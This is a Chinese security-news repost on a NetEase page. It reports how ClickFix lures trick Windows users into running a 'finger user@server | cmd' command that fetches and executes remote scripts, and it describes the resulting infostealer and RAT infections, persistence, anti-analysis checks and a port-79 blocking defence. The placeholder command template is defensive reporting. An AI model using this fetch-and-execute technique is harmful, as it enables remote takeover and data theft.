网易首页 > 网易号 > 正文 申请入驻

【安全圈】约 40 年前的 Windows 古董命令被滥用,黑客远程投毒可掌控你的 PC

0
分享至

关键词

黑客

科技媒体 bleepingcomputer 昨日(11 月 15 日)发布博文,报道称近期有黑客滥用诞生约年的 "Finger" 协议,成为新型 ClickFix 恶意软件攻击的关键环节。

注:"Finger" 协议是一种非常早期的互联网协议,诞生于上世纪 70 年代,主要功能是让用户查询其他用户的公开信息(如登录名、最后上线时间等)。在现代网络环境中已基本废弃,但其客户端程序(finger.exe)仍在某些操作系统(如 Windows)中保留。

攻击者利用该协议,在新型的 ClickFix 恶意软件攻击中,向受感染的 Windows 设备远程下发并执行恶意命令。Finger 协议最初用于在 Unix / Linux 系统上查询用户信息,后来也被集成到 Windows 中。

虽然如今已鲜有人使用,但其作为系统原生工具的特性,让其成为一种理想的 " 原生二进制程序(LOLBIN)",能有效规避部分安全软件的检测。

攻击的核心在于社会工程学欺骗。攻击者会通过各种方式(如网页弹窗)显示一个伪造的 " 人机验证 " 提示,诱导用户按下 Win+R 快捷键并输入一行看似无害的命令。


该命令格式通常为 finger [ 用户名 ] @ [ 恶意服务器地址 ] | cmd。一旦用户执行,Windows 系统内置的 finger.exe 程序便会向指定服务器发起请求,而服务器返回的并非用户信息,而是一段预设的恶意脚本。

通过管道符 |,该脚本的输出被直接传递给 Windows 命令处理器 cmd.exe 执行,从而完成恶意代码的远程投递。


恶意脚本执行后,会立即展开一系列后续动作。它首先会创建一个随机命名的路径,并下载一个伪装成 PDF 文件的 ZIP 压缩包。解压后,其中的恶意载荷便会被激活。


根据分析,这些载荷主要分为两类:一类是专门用于窃取用户密码、浏览器记录等敏感数据的信息窃取程序(Infostealer);另一类则是功能更强大的 NetSupport Manager 远程访问木马(RAT),一旦植入,攻击者便能完全控制受害者的计算机。

为实现持久化,该脚本还会创建一个计划任务,确保恶意软件在用户每次登录系统时都能自动运行。


研究人员发现,这种攻击手法还在不断演进。在一些更新的攻击案例中,恶意脚本在执行核心任务前,会先扫描受害者电脑中是否存在常见的恶意软件分析工具。


这些工具包括 Process Monitor、Wireshark、Fiddler、OllyDbg 等数十款。如果检测到任何一款分析工具正在运行,脚本会立即终止执行,从而增加安全研究人员对其进行分析和追踪的难度。

由于此类攻击依赖于 Finger 协议进行通信,而该协议使用专门的 TCP 79 端口,因此防御策略也相对明确。对于绝大多数企业和个人用户而言,Finger 协议并无实际用途。因此,系统管理员和安全防护人员应在网络防火墙上阻止所有出站到 TCP 79 端口的流量。


安全圈


网罗圈内热点 专注网络安全

实时资讯一手掌握!

好看你就分享 有用就点个赞

支持「安全圈」就点个三连吧!

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
印共(毛主义)主要领导人被打死,印共(毛)是否到了穷途末路

印共(毛主义)主要领导人被打死,印共(毛)是否到了穷途末路

小院之观
2025-11-19 10:14:33
“建议拆完快递的纸箱立马扔掉”火上热搜,网友:再也不敢囤了

“建议拆完快递的纸箱立马扔掉”火上热搜,网友:再也不敢囤了

寒士之言本尊
2025-11-18 15:14:51
中日关系高度紧张:大量中国游客赴日!网友:富士山下都是中国人

中日关系高度紧张:大量中国游客赴日!网友:富士山下都是中国人

大国纪录
2025-11-19 15:52:44
没条件别硬演,45岁霍建华用不修边幅的演技告诉内娱,如何演中偶

没条件别硬演,45岁霍建华用不修边幅的演技告诉内娱,如何演中偶

娱乐故事
2025-11-19 23:23:41
中国“以牙还牙”,高市早苗怂了,再打台湾牌,琉球就要保不住了

中国“以牙还牙”,高市早苗怂了,再打台湾牌,琉球就要保不住了

阿钊是个小小评论员
2025-11-18 17:50:58
出乎意料!继王曼昱后,陈梦也避开跟孙颖莎打比赛,放弃女单一号

出乎意料!继王曼昱后,陈梦也避开跟孙颖莎打比赛,放弃女单一号

侃球熊弟
2025-11-19 17:44:51
俄罗斯领空已禁止日本航空飞行,如果中国也禁飞,看它怎么去欧洲

俄罗斯领空已禁止日本航空飞行,如果中国也禁飞,看它怎么去欧洲

我心纵横天地间
2025-11-18 20:07:05
6国外援候命,高市通知全球,对华打响第二枪,中方被逼上硬菜

6国外援候命,高市通知全球,对华打响第二枪,中方被逼上硬菜

沧海旅行家
2025-11-18 15:41:09
加入CPTPP:关乎未来的“高难度闯关”搏杀

加入CPTPP:关乎未来的“高难度闯关”搏杀

墨心人
2025-11-19 19:42:48
丰田新车官宣:11月21日,正式发布!

丰田新车官宣:11月21日,正式发布!

高科技爱好者
2025-11-19 23:18:29
收橙子被骗后续!商家只能认赔,代办拿入乡随俗挡箭,云南上热搜

收橙子被骗后续!商家只能认赔,代办拿入乡随俗挡箭,云南上热搜

奇思妙想草叶君
2025-11-18 23:20:33
满屏荷尔蒙!网飞这一脱,又赢麻了

满屏荷尔蒙!网飞这一脱,又赢麻了

来看美剧
2025-11-17 21:10:16
网约车出险4次,保费涨到19800元!司机:只有一家愿意续保!

网约车出险4次,保费涨到19800元!司机:只有一家愿意续保!

网约车焦点
2025-11-19 11:43:17
中国官员双手插兜后续:日方上下齐破防,刘劲松及外交部分别回应

中国官员双手插兜后续:日方上下齐破防,刘劲松及外交部分别回应

吭哧有力
2025-11-19 17:58:37
被丈夫出轨8次,被闺蜜无情背叛,43岁抑郁后在家中烧炭自尽

被丈夫出轨8次,被闺蜜无情背叛,43岁抑郁后在家中烧炭自尽

牛牛叨史
2025-11-20 00:49:48
“盲眼神婆”录音曝光:预言2026多灾多难,“神子”将降临地球

“盲眼神婆”录音曝光:预言2026多灾多难,“神子”将降临地球

摇扇公子聊天下
2025-11-14 11:06:41
大公开!独行侠内斗升级,老板越权介入啊,再见了,浓眉

大公开!独行侠内斗升级,老板越权介入啊,再见了,浓眉

球童无忌
2025-11-19 23:37:27
奔驰女司机停车长裙掩护当街大便画面曝光,网友批:不清理吗?

奔驰女司机停车长裙掩护当街大便画面曝光,网友批:不清理吗?

环球趣闻分享
2025-11-19 20:23:57
太恶劣!上海数名蔚来车主同时被坑惨!消费者寒心

太恶劣!上海数名蔚来车主同时被坑惨!消费者寒心

看看新闻Knews
2025-11-19 21:52:06
皇马小将:梅西还是C罗?我虽忠诚皇马,但梅西是第一人!

皇马小将:梅西还是C罗?我虽忠诚皇马,但梅西是第一人!

氧气是个地铁
2025-11-19 22:38:18
2025-11-20 02:08:49
安全圈
安全圈
国内首家大安全概念新媒体
6158文章数 4688关注度
往期回顾 全部

科技要闻

一夜封神,Gemini 3让谷歌找回“碾压感”

头条要闻

日方要求解释为何未告知磋商后会有媒体拍摄 中方回应

头条要闻

日方要求解释为何未告知磋商后会有媒体拍摄 中方回应

体育要闻

世界杯最小参赛国诞生!15万人岛国的奇迹

娱乐要闻

史林子出轨对方前妻放锤!

财经要闻

重磅!中金公司拟收购东兴与信达证券

汽车要闻

此刻价格不重要 第5代帝豪本身就是价值

态度原创

艺术
旅游
本地
教育
数码

艺术要闻

惊呆了!外国画家如何颠覆水浒108将的形象?

旅游要闻

上关镇位于洱海的一侧,没什么网红景点,堪称大理最安逸的角落

本地新闻

第十二届影展携手重庆来福士丨两江交汇,光影共生

教育要闻

晓星国际高等学校宿舍什么样子

数码要闻

猫头鹰黑化版散热器风扇来袭

无障碍浏览 进入关怀版